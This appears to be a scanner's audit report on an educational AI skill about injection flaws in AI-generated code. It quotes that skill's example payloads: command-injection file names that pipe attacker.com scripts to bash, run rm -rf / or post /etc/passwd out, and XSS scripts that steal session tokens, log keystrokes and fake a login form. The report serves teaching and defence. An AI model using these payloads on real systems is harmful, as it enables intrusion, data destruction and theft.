injection-vulnerabilities-ai-generated-code

Explores how AI-generated code can introduce injection vulnerabilities, providing insights into SQL injection, command injection, and XSS patterns.

Security score: 0/100

The injection-vulnerabilities-ai-generated-code skill was audited on Feb 12, 2026 and we found 49 security issues across 4 threat categories, including 8 critical. Review the findings below before installing. Every finding is a pattern match against SKILL.md, the skill's own write-up of injection vulnerabilities, so the flagged lines include its deliberately vulnerable examples next to the fixed versions, and several of the "critical" hits are prose or markdown table rows that mention exec() (for example "**exec() vs spawn():**" and "| Feature | exec() | spawn() |") rather than executable code. Check whether each flagged line is code the skill would actually run before treating it as a defect in the skill.

Security Issues

high, SKILL.md line 140: Direct command execution function call
    exec(command, (error, stdout, stderr) => {

high, SKILL.md line 176: Direct command execution function call
    const convert = spawn('convert', [

critical, SKILL.md line 193: Direct command execution function call
    **1. exec() is Simpler:**

critical, SKILL.md line 194: Direct command execution function call
    - Single function call vs spawn() configuration

critical, SKILL.md line 196: Direct command execution function call
    - exec() allows shell syntax (pipes, redirects)

critical, SKILL.md line 232: Direct command execution function call
    **exec() vs spawn():**

critical, SKILL.md line 234: Direct command execution function call
    | Feature | exec() | spawn() |

critical, SKILL.md line 392: Direct command execution function call
    - Shell: `exec(f"convert (unknown)")`

critical, SKILL.md line 430: Direct command execution function call
    ❌ **exec() with user input:**

high, SKILL.md line 432: Direct command execution function call
    exec(`command ${userInput}`)

high, SKILL.md line 433: Direct command execution function call
    exec("command " + userInput)

critical, SKILL.md line 437: Direct command execution function call
    ✅ **spawn() with argument array:**

high, SKILL.md line 439: Direct command execution function call
    spawn('command', [arg1, arg2, arg3])

high, SKILL.md line 500: Direct command execution function call
    exec(`convert $(unknown) output.jpg`); // VULNERABLE

high, SKILL.md line 517: Direct command execution function call
    const convert = spawn('convert', [filename, 'output.jpg']);
medium, SKILL.md line 138: Template literal with variable interpolation in command context
    const command = `convert ${inputFile} -quality ${quality} output.${outputFormat}`;

medium, SKILL.md line 144: Template literal with variable interpolation in command context
    res.json({ success: true, output: `output.${outputFormat}` });

medium, SKILL.md line 179: Template literal with variable interpolation in command context
    `output.${outputFormat}`

medium, SKILL.md line 186: Template literal with variable interpolation in command context
    res.json({ success: true, output: `output.${outputFormat}` });

medium, SKILL.md line 265: Template literal with variable interpolation in command context
    html += `

medium, SKILL.md line 297: Template literal with variable interpolation in command context
    html += `

high, SKILL.md line 393: Template literal with variable interpolation in command context
    - HTML: `html += `<div>${user_content}</div>``

medium, SKILL.md line 432: Template literal with variable interpolation in command context
    exec(`command ${userInput}`)

medium, SKILL.md line 447: Template literal with variable interpolation in command context
    html += `<div>${userContent}</div>`

medium, SKILL.md line 454: Template literal with variable interpolation in command context
    html += `<div>${escapeHtml(userContent)}</div>`

medium, SKILL.md line 500: Template literal with variable interpolation in command context
    exec(`convert $(unknown) output.jpg`); // VULNERABLE
high, SKILL.md line 149: Piping content to bash shell
    // inputFile = "test.jpg; curl http://attacker.com/shell.sh | bash"

high, SKILL.md line 212: Destructive rm -rf command
    inputFile = "image.jpg; rm -rf /"

high, SKILL.md line 213: Destructive rm -rf command
    // Executes: convert image.jpg -quality 80 output.jpg; rm -rf /

medium, SKILL.md line 434: System command execution
    os.system(f"command {user_input}") // Python

low, SKILL.md line 132: Node child_process module reference
    const { exec } = require('child_process');

low, SKILL.md line 155: Node child_process module reference
    const { spawn } = require('child_process');

low, SKILL.md line 496: Node child_process module reference
    import { exec } from 'child_process';

low, SKILL.md line 506: Node child_process module reference
    import { spawn } from 'child_process';

medium, SKILL.md line 434: Python os.system command execution
    os.system(f"command {user_input}") // Python

medium, SKILL.md line 440: Python subprocess execution
    subprocess.run(['command', arg1, arg2]) // Python

medium, SKILL.md line 149: Curl to non-GitHub URL
    // inputFile = "test.jpg; curl http://attacker.com/shell.sh | bash"

medium, SKILL.md line 226: Curl to non-GitHub URL
    inputFile = "image.jpg; curl -X POST https://attacker.com/data -d @/etc/passwd"

low, SKILL.md line 279: Fetch to external URL
    // comment.content = "<script>fetch('/api/session').then(r=>r.text()).then(t=>fetch('https://attacker.com?token='+t))</script>"

low, SKILL.md line 338: Fetch to external URL
    fetch('/api/session')

low, SKILL.md line 341: Fetch to external URL
    fetch('https://attacker.com/steal', {

low, SKILL.md line 366: Fetch to external URL
    fetch('https://attacker.com/keys?key=' + e.key);

high, SKILL.md line 226: Access to /etc/passwd
    inputFile = "image.jpg; curl -X POST https://attacker.com/data -d @/etc/passwd"

low, SKILL.md line 149: External URL reference
    // inputFile = "test.jpg; curl http://attacker.com/shell.sh | bash"

low, SKILL.md line 226: External URL reference
    inputFile = "image.jpg; curl -X POST https://attacker.com/data -d @/etc/passwd"

low, SKILL.md line 279: External URL reference
    // comment.content = "<script>fetch('/api/session').then(r=>r.text()).then(t=>fetch('https://attacker.com?token='+t))</script>"

low, SKILL.md line 341: External URL reference
    fetch('https://attacker.com/steal', {

low, SKILL.md line 355: External URL reference
    document.body.innerHTML += '<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:white;z-index:9999"><form action="https://attacker.com/phish"><h2>Session Expired - Please Login</

low, SKILL.md line 366: External URL reference
    fetch('https://attacker.com/keys?key=' + e.key);
Scanned on Feb 12, 2026